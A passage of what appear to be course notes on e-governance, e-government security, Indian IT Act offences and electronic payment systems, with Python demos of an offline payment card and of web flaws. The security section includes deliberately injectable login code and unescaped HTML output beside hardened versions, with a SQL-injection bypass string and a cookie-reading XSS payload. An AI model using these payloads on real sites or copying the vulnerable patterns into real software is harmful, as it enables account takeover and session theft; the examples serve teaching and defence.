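        self.seen = set()                   # (payer, seq) pairs already credited: replay check
        self.log = deque(maxlen=LOG_SIZE)   # oldest entries fall off silently: the overflow

    def _mac(self, msg: dict) -> str:
        data = json.dumps(msg, sort_keys=True).encode()
        return hmac.new(ISSUER_KEY, data, hashlib.sha256).hexdigest()

    def pay(self, payee: str, amount: int) -> dict:
        """Build a signed value transfer. Offline: no bank is contacted."""
        if amount <= 0 or amount > self.balance:
            raise ValueError("insufficient value on card")
        self.seq += 1
        msg = {"from": self.card_id, "to": payee, "amount": amount, "seq": self.seq}
        self.balance -= amount              # value leaves the card before the message does
        self.log.append(msg)
        return {**msg, "mac": self._mac(msg)}

    def receive(self, transfer: dict) -> None:
        """Credit a transfer after checking its MAC, addressee and freshness."""
        msg = {k: v for k, v in transfer.items() if k != "mac"}
        if not hmac.compare_digest(transfer["mac"], self._mac(msg)):
            raise ValueError("bad MAC: forged or altered transfer")
        if msg["to"] != self.card_id:
            raise ValueError("transfer addressed to another card")
        key = (msg["from"], msg["seq"])
        if key in self.seen:
            raise ValueError("replayed transfer")
        self.seen.add(key)
        self.balance += msg["amount"]
        self.log.append(msg)

    def upload(self) -> list:
        """What the bank can recover when the card next goes online."""
        return list(self.log)


def demo_overflow(n_payments: int) -> tuple:
    """Alice pays Bob n times; returns (transactions issued, entries still on the card,
    oldest recoverable sequence number)."""
    alice = Purse("card-A", 10_000)
    bob = Purse("card-B", 0)
    for _ in range(n_payments):
        bob.receive(alice.pay("card-B", 100))
    uploaded = alice.upload()
    return alice.seq, len(uploaded), uploaded[0]["seq"] if uploaded else None


def tampered_rejected() -> bool:
    """Raising the amount after signing must fail the MAC check and credit nothing."""
    alice, bob = Purse("card-A", 500), Purse("card-B", 0)
    t = alice.pay("card-B", 100)
    t["amount"] = 400
    try:
        bob.receive(t)
    except ValueError:
        return bob.balance == 0
    return False


def replay_rejected() -> bool:
    """Presenting the same transfer twice must credit the payee only once."""
    alice, bob = Purse("card-A", 500), Purse("card-B", 0)
    t = alice.pay("card-B", 100)
    bob.receive(t)
    try:
        bob.receive(t)
    except ValueError:
        return bob.balance == 100
    return False


if __name__ == "__main__":
    print(demo_overflow(15))    # 15 issued, 10 still on the card, oldest recoverable seq is 6
    print(tampered_rejected(), replay_rejected())
```

With fifteen payments the card still holds only ten entries, so the bank's first upload starts at the sixth transaction; the five before it are exactly the data the critics say is lost before fraud detection can run.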

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define it to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance, or electronic governance. The word "electronic" in the term e-governance implies technology-driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, and the integration of various stand-alone systems and services between government-to-citizen (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back-office processes and interactions within the entire government framework. Through e-governance, government services are made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally, four basic models are available: government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance

Both terms are often treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration, combined with organizational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with taking this as a definition of e-governance as well is that it makes no provision for the governance of the ICTs themselves. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders that this entails. So the perspective of e-governance is the use of technologies that both help in governing and have themselves to be governed. Public-Private Partnership (PPP) based e-governance projects have been hugely successful in India. United Telecoms Limited (UTL) is a major player in India on PPP-based e-governance projects, each of which involved a mammoth state-wide area network.

E-governance is the future that many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended for the desired individual have actually reached them. There should be an auto-response to support the essence of e-governance, whereby the Government can see the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on the unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government and enhance citizens' economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE

A suggested architecture for e-Governance is shown in the diagram, which illustrates that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere through the network. This is possible because of the characteristics of CORBA: it is location transparent, language independent, implementation independent and operating system independent. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit the CORBA specifications, new Web applications, or even a database environment using Oracle, etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services, such as Transactions, Database Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos protocol and the Generic Security Service (GSS) API. While those technologies carry considerable weight, public-key security with Secure Sockets Layer (SSL; today its successor, TLS) is popular for Internet-based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.


G2C (Government to Citizens)

In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand, and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. a service centre, an unattended kiosk, or one's home/workplace) and how to interact with the government (e.g. through Internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to aid the business community, the providers of goods and services, to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. G2B initiatives can be transactional, such as licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment for businesses, enabling them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand, and increases the satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B): refers to the conducting of transactions between government bodies and businesses via the Internet.

Business to government (B2G): professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter

• Generally, but not always, involving:

  – Long Term Contracts

  – User Charges and/or Payments flowing between the Parties

  – Shared Investments, but Mainly Private

  – Risk Sharing by the Parties

• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves the objectives of the individual partners.

Why do them?

• Fiscal Head Room

• As a Way of Financing the Project

• Separate Policy & Regulation from Operations

• Make the Good or Service Available

• Pay for Performance and Output

• Introduce Competition, For and In the Market

The Need to Set the Right Priorities

Four Basic Dimensions of P3

Although each is unique, all P3s include four basic characteristics:

• Shared goals

• Shared resources (time, money, expertise, people)

• Shared risks

• Shared benefits

Benefits

• Expedited project completion

• Project cost savings

• Improved quality

• Use of private resources

• Access to new sources of private capital

Two Major Steps

• Crafting the Partnership

• Implementing the Partnership

Project Management: Six Distinct Phases

1. Genesis

  – What's the need?

  – What's driving the need (rationale)? Facility non-compliance, natural disaster, budget deficit

  – Is there a need for a Public/Private Partnership?

2. Preliminary Project Definition: Feasibility

  – Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?

  – Market Research

  – Economic/Financial Analysis

  – Program, Budget and Schedule

  – Risk Analysis

3. Plan and Test: Final project definition

  – What is the best way to complete the project?

  – Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?

  – Master Schedule/Budget

  – Political Climate

  – Any potential "fatal flaws" that could derail the project?

4. Procurement and Contracting

  – How do you choose and contract with the best-value private partner?

  – What's the best delivery method? Design-Bid-Build, Design-Build, Finance-Design-Build

  – What do current statutes allow?

  – Procurement Approach: Sole Source, RFP, Low Bid

  – Risk Allocation between Public and Private Partners

  – Structuring of Contract, Risks and Rewards

5. Implement

  – Environmental

  – Design

  – Permitting

  – Construction

  – Commissioning and Administration

6. Operate

  – Startup

  – Monitoring

  – Assessment

  – Enhancement

  – Contract Modifications

  – Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest the efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index also tend to have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites, one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services, and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organisation for Economic Co-operation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will depend heavily on the trust they have in the data security of the service.

2. INFORMATION SECURITY

A central challenge of e-Government services is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures, by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

• understanding an organization's information security requirements and the need to establish a policy and objectives for information security;

• implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;

• monitoring and reviewing the performance and effectiveness of the ISMS, with continual improvement based on objective measurement.

Data security requires a set of security properties:

• Authentication: the capability to identify who is using the services (a person or a software program); the process of verifying that you are who you say you are.

• Authorization: the capability to grant access rights to resources; the process of verifying that someone has the right to do what they are trying to do.

• Confidentiality: the capability to prevent unauthorized access to information.

• Integrity: the capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.

• Traceability: the capability to chronologically relate any transaction to the person or system that performed the action, in a verifiable way.

• Non-repudiation: the capability to prevent a person or system involved in an event or action from denying or challenging their participation in it.

Examples of organizational and technical measures to prevent unauthorized access and processing are:

• Protecting premises, equipment and system software, including input/output units;

• Protecting software applications used to process personal data;

• Preventing unauthorized access to personal data during transmission, including transmission via telecommunication means and networks;

• Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data;

• Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and by whom, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data.

Although trusted security and privacy measures constitute a crucial success factor for e-Government, the issue has not yet been adequately addressed: the UN 2012 Survey shows that only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44% of its countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Examples of attacks on such services include packet sniffing, probing, malware, attacks on the Internet infrastructure, denial of service, remote-to-local and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

• achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis;

• maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness;

• continually improve its control environment;

• effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. One research study found 816 e-Government websites from 212 different countries to be vulnerable to Cross-Site Scripting (XSS) and SQL injection. A SQL injection attack can compromise data integrity (and, since it lets the attacker run queries of their own choosing, confidentiality as well), while XSS is a vulnerability which attackers may exploit to steal users' information or act within their session.
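The two vulnerability classes named above, as an added example that is not from the page or any real e-Government portal: a citizen login lookup and a profile page, each written the injectable/XSS-prone way beside the hardened way. The table, accounts and attack strings are constructed for the demonstration; only the standard-library sqlite3 and html modules are used, so it runs offline.

```python
import html
import sqlite3


# Constructed sample table: a tiny citizen login store for the demo.
# (Storing plaintext passwords is itself a defect; a real portal stores salted hashes.)
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE citizens (username TEXT, password TEXT, display_name TEXT)")
    conn.executemany(
        "INSERT INTO citizens VALUES (?, ?, ?)",
        [("asha", "s3cret", "Asha"), ("ravi", "hunter2", "Ravi")],
    )
    return conn


# --- SQL injection: input concatenated into the query becomes part of the SQL grammar ---
def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    sql = ("SELECT 1 FROM citizens WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


# --- hardened: placeholders keep the input as data; the query shape cannot change ---
def login_hardened(conn: sqlite3.Connection, username: str, password: str) -> bool:
    row = conn.execute(
        "SELECT 1 FROM citizens WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


# --- XSS: a display name echoed into HTML unescaped is interpreted as markup ---
def profile_vulnerable(display_name: str) -> str:
    return "<h1>Welcome, " + display_name + "</h1>"


# --- hardened: escape for the HTML text context before echoing ---
def profile_hardened(display_name: str) -> str:
    return "<h1>Welcome, " + html.escape(display_name, quote=True) + "</h1>"


SQLI_PAYLOAD = "asha' --"      # closes the string and comments out the password clause
XSS_PAYLOAD = "<img src=x onerror=alert(document.cookie)>"   # constructed test string


def demo() -> dict:
    conn = make_db()
    return {
        # the injected username logs in as asha without the password
        "sqli_vulnerable_bypass": login_vulnerable(conn, SQLI_PAYLOAD, "wrong"),
        "sqli_hardened_bypass": login_hardened(conn, SQLI_PAYLOAD, "wrong"),
        "hardened_valid_login": login_hardened(conn, "asha", "s3cret"),
        # the unescaped page contains a live <img> element; the escaped one does not
        "xss_vulnerable_has_tag": "<img" in profile_vulnerable(XSS_PAYLOAD),
        "xss_hardened_has_tag": "<img" in profile_hardened(XSS_PAYLOAD),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The vulnerable login accepts `asha' --` with any password because the `--` turns the rest of the statement into a comment; the parameterised version compares the whole string against the column and fails. Escaping must match the output context: html.escape is right for text between tags, while attribute values, URLs and JavaScript strings each need their own encoding.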

Specific security measures, like firewalls, intrusion detection software, encryption and secure networks, must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained in cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies, and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality or social order, or any unjust or shameful act. "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage, or information warfare and related activities.

Pornography, threatening email, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber squatting is the act of registering a famous domain name and then selling it for a fortune. This is an issue that has not been tackled in the IT Act 2000.

Phishing

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of financial institutions, requesting them to enter their username, password or other personal information to access their account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services. It is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base

• 121 million Internet users

• 65 million active Internet users, up 28% from 51 million in 2010

• 50 million users shop online on e-commerce and online shopping sites

• 46+ million social network users

• 346 million mobile users have subscribed to data packages


CYBER LAW

Section 66 (as originally enacted in the IT Act 2000): Hacking with computer system

(1) Whoever, with the intent to cause, or knowing that he is likely to cause, wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with a fine which may extend up to two lakh rupees, or with both.

Section 43: Penalty for damage to computer, computer system, etc.

Whoever, without permission of the owner of the computer:

• secures access;

• downloads, copies or extracts any data, computer database or any information;

• introduces or causes to be introduced any virus or contaminant;

• disrupts or causes disruption;

• denies or causes denial of access to any person;

• provides any assistance to any person to facilitate access;

• charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;

• destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means;

• steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected (the 2008 amendment removed this upper limit).

Section 66 (as amended in 2008): "If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years or with fine which may extend to five lakh rupees or with both." [S66]

S 66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

• any information that is grossly offensive or has menacing character; or

• any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes use of such computer resource or communication device; or

• any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages,

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67A - Punishment for publishing or transmitting of material containing sexually explicit act, etc. in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67C - Preservation and retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This Act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It received Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

Information Technology Act 2000 addressed the following issues

1 Legal recognition of electronic documents

2 Legal Recognition of digital signatures

3 Offenses and contraventions

4 Justice dispensation systems for cybercrimes

Offences

Section 65: Tampering with computer source documents. Intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force. Punishment: imprisonment up to three years, or a fine up to 2 lakh rupees, or both.

Section 66: Hacking. Punishment: imprisonment up to three years, or a fine up to 5 lakh rupees, or both.

Section 66-A: Sending offensive messages through electronic means. Sending any information through an electronic message that is grossly offensive or has menacing character, or might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages. Punishment: imprisonment up to three years and a fine.

Criticisms -

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticised the amendments for lacking the legal and procedural safeguards needed to prevent violation of the civil liberties of Indians. Other observers have welcomed the amendments because they address cyber security.

Section 69 empowers the Central Government, a State Government, or an agency authorised by either to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient to do so in the interest of the sovereignty or integrity of India, the defence of India, the security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for the investigation of any offence. The authorities can also compel computer personnel to assist in decrypting data (mandatory decryption), with imprisonment for refusal.

Section 66A is widely criticised and has led to numerous abuses reported by the press. Its constitutional validity was challenged in the Lucknow and Madras High Courts. Relying on Section 66A, the Bombay High Court held that creating a website and storing false information on it can amount to a cyber crime. (Section 66A was later struck down as unconstitutional by the Supreme Court of India in Shreya Singhal v. Union of India, 2015.)


E-Cash

- A system that allows a person to pay for goods or services by transmitting a number from one computer to another.
- Like the serial numbers on real currency notes, the e-cash numbers are unique.
- It is issued by a bank and represents a specified sum of real money.
- It is anonymous and reusable.

Electronic Cash Security

- Complex cryptographic algorithms prevent double spending.
- Anonymity is preserved unless double spending is attempted.
- Serial numbers can allow tracing to prevent money laundering.

E-Cash Processing


E-Wallet

The e-wallet is another payment scheme that operates as a carrier of e-cash and other information. The aim is to give shoppers a single, simple and secure way of carrying currency electronically. Trust is the basis of the e-wallet as a form of electronic payment.

Procedure for using an e-wallet:

1. Decide on an online site where you would like to shop.
2. Download a wallet from the merchant's website.
3. Fill out personal information such as your credit card number, name, address and phone number, and where merchandise should be shipped.
4. When you are ready to buy, click on the wallet button; the buying process is then executed in full.


Smart Cards

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input, which is processed and delivered as output.

Smart card Processing


Smart Card Applications -

- Ticketless travel: the Seoul bus system (4M cards, 1B transactions since 1996); planned for the SF Bay Area system
- Authentication, ID
- Medical records
- E-cash
- Store loyalty programs
- Personal profiles
- Government
- Licenses
- Mall parking

Credit cards

A credit card is a plastic card with an account number and code encoded on its magnetic stripe. It carries a fixed credit limit available to spend, and the customer repays the amount spent after the billing period.


Processing a credit card payment -

Risks in using credit cards -

- Operational risk
- Credit risk
- Legal risk

Secure Electronic Transaction (SET) Protocol

- Jointly designed by MasterCard and Visa with the backing of Microsoft, Netscape, IBM, GTE, SAIC and others.
- Designed to provide security for card payments as they travel on the Internet.
- In contrast with the Secure Sockets Layer (SSL) protocol, SET validates consumers and merchants in addition to providing secure transmission.

SET specification

- Uses public key cryptography and digital certificates for validating both consumers and merchants.


- Provides privacy, data integrity, user and merchant authentication, and consumer non-repudiation.

The SET Protocol

What is a payment gateway?

A payment gateway is an e-commerce application service provider service that authorises payments for e-businesses, online shopping and so on.


A payment gateway protects card details by encrypting sensitive information such as credit card numbers, so that the information passes securely between the customer and the merchant, and between the merchant and the payment processor.

How it works

Payments In India

Going the e-way

e-PAYMENT SYSTEM IN INDIA

- Ever-increasing technology changes
- Growing Internet access and mobile subscriber base
- Rising consumer confidence
- Convenient delivery/payment models
- India has been one of the fastest growing countries for payment cards in the Asia-Pacific region
- India currently has approximately 130 million cards (both debit and credit) in circulation


GROWTH IN e-PAYMENT SYSTEM

REGULATION-

The Reserve Bank of India (RBI) has been supportive of the development of electronic payments. In this direction the Payment and Settlement Systems Act, 2007 was enacted. Apart from being supportive, the RBI has also initiated various programs to encourage e-payments.

CHANNELS OF PAYMENT-

Indian banks have put in place various channels of electronic payment to encourage customers to adopt the electronic mode. Channels like the Internet, mobile, ATMs and drop boxes are some of the most frequently used channels apart from bank branches.

MARKET MAPPING-

The e-payments processing market has two major players, TechProcess and BillDesk, the latter a pure-play electronic transaction processing company.

The Indian payment system is transforming from paper mode to electronic mode. Two main reasons for this shift are:


1. The regulator has mandated routing all high-value transactions electronically to minimise the movement of money and risk.
2. At the retail end, customers are realising the efficiency of electronic payments.

SHIFTS IN THE PAYMENT SYSTEM

TECHNOLOGICAL ADVANCEMENT IN e-PAYMENT

- Electronic Clearing Service (Credit and Debit)
- National Electronic Fund Transfer (NEFT)

THE RULING PLASTIC MONEY

Credit cards

Debit cards

ATM Cards

PayPal

PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods such as checks and money orders. It is subject to the US economic sanctions list and other rules and interventions required by US laws or government. PayPal is an acquirer, performing payment processing for online vendors, auction sites and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002 PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States, at eBay's North First Street satellite office campus. The company also has significant operations in Omaha, Scottsdale, Charlotte and Austin in the United States, Chennai in India, Dublin in Ireland, Kleinmachnow in Germany and Tel Aviv in Israel. Since July 2007 PayPal has operated across the European Union as a Luxembourg-based bank.

Google Wallet

Google Wallet was launched in 2011, serving a similar function to PayPal in facilitating payments and money transfers online. It also features robust security and additional features such as the ability to send payments as attachments via email.


CHARACTERISTICS OF PAYMENT SYSTEM

- There is no paper involved, so electronic payments can be effected directly from home or office.
- Fast, efficient, safe, secure and generally less costly than paper-based alternatives such as cheques.
- Electronic payments are fully traceable.
- In Ireland the clearing time for standard electronic payments is next-day value for interbank transfers, subject to the payment instruction being received ahead of 'shut-off' times, which can vary from bank to bank. Payment instructions received after the 'shut-off' time will be processed one working day later.
- Most banks offer same-day value for payments made to other accounts held in that same bank.
- Many banks offer same-day inter-bank transfer services for large-value payments.
- Unlike cheques, electronic payments don't 'bounce', as a payment will not be effected unless the funds are available in the first place.


Features of Payment Methods

- Anonymity: whether the payment method is anonymous
- Security: whether the payment method is secure
- Overhead cost: the overhead cost of processing a payment
- Transferability: whether a payment can be carried out without the involvement of a third party
- Divisibility: whether a payment can be divided into arbitrarily small payments whose sum is equal to the original payment
- Acceptability: whether the payment method is supported globally

4C PAYMENT METHODS

To make the e-commerce system functional, we also need to incorporate payment functions into the system. In the physical world there are four types of payment method:

- Cash
- Credit card
- Check (cheque)
- Credit/debit (fund transfer)

A payment method should be:

- Very secure
- Low in overhead cost
- Transferable
- Acceptable anywhere
- Divisible
- Anonymous

Comparison of the 4C payment methods


SET PROTOCOL FOR CREDIT CARD PAYMENT

- The credit card is one of the most commonly used payment methods in e-commerce, in particular B2C e-commerce.
- Before the introduction of the SET protocol, secure credit card payment was usually carried out over an SSL connection.

Advantage of SSL

- It ensures the secure transmission of credit card information over the Internet.

Disadvantage of SSL

- It is not a complete credit card payment method.
- For example, it cannot by itself support on-line credit card authorisation.

SET was developed specifically to provide secure credit card payment over the Internet, and was backed by the major card companies including Visa and MasterCard. (In practice SET saw little deployment and was abandoned; Web card payments today run over SSL/TLS, with schemes such as 3-D Secure for cardholder authentication.)


